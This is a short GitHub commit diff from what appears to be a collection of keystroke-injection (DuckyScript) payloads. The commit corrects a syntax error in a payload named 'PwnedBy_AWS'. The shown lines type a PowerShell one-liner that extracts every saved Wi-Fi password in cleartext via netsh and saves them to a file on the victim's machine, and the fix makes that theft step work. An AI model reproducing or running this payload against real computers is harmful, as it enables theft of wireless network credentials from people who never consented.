Update PwnedBy_AWS

Syntax correction
pull/241/head
crackingsh3llz 2024-10-30 09:30:10 -04:00 committed by GitHub
parent e7961c6677
commit ca80a741fb
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 1 additions and 1 deletions

View File

@ -127,7 +127,7 @@ ENTER
REM Retrieve passwords for each Wi-Fi profile and save to a text file
STRING netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $profileName =
$_.ToString().Split(':')[1].Trim(); netsh wlan show profile name="$profileName" key=clear | SelectString 'Key Content' } > C:\temp\wifi_passwords.txt
$_.ToString().Split(':')[1].Trim(); netsh wlan show profile name="$profileName" key=clear | Select-String 'Key Content' } > C:\temp\wifi_passwords.txt
ENTER
DELAY 1000